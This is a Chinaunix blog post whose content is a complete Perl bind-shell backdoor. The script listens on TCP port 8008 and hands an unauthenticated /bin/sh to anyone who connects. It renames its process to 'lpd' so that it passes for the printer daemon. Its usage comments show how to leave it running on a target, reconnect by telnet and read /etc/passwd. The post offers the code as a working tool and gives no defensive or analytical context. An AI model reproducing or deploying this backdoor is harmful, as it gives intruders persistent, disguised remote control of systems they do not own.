Chinaunix首页 | 论坛 | 博客
  • 博客访问: 371614
  • 博文数量: 89
  • 博客积分: 3178
  • 博客等级: 中校
  • 技术积分: 965
  • 用 户 组: 普通用户
  • 注册时间: 2008-07-09 15:31
文章分类

全部博文(89)

文章存档

2013年(10)

2012年(33)

2011年(41)

2008年(5)

分类: LINUX

2011-10-24 14:05:44

  1. #!/usr/bin/perl
  2. #
  3. # * Author xiehou
  4. #
  5. # * Description:
  6. # Remote unix shell backdoor.
  7. #
  8. # * Usage:
  9. # remote target $ ./nohup bindshell.pl &
  10. # remote target$ exit
  11. # Connection closed by foreign host
  12. # localhost$ telnet remote target 8008
  13. # Trying 192.168.1.1...
  14. # Connected to remote target.
  15. # Escape character is '^]'.
  16. # (user@remote name:/home/user/)
  17. # cat /etc/passwd; etc

  18. use Socket;

  19. $port    = 8008;
  20. $proto    = getprotobyname('tcp');
  21. $cmd    = "lpd";
  22. $system    = 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';

  23. $0 = $cmd;

  24. socket(SERVER, PF_INET, SOCK_STREAM, $proto)
  25.                     or die "socket:$!";
  26. setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
  27.                     or die "setsockopt: $!";
  28. bind(SERVER, sockaddr_in($port, INADDR_ANY))
  29.                     or die "bind: $!";
  30. listen(SERVER, SOMAXCONN)        or die "listen: $!";

  31. for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
  32. {
  33.     open(STDIN, ">&CLIENT");
  34.     open(STDOUT, ">&CLIENT");
  35.     open(STDERR, ">&CLIENT");

  36.     system($system);

  37.     close(STDIN);
  38.     close(STDOUT);
  39.     close(STDERR);
  40. }
阅读(718) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~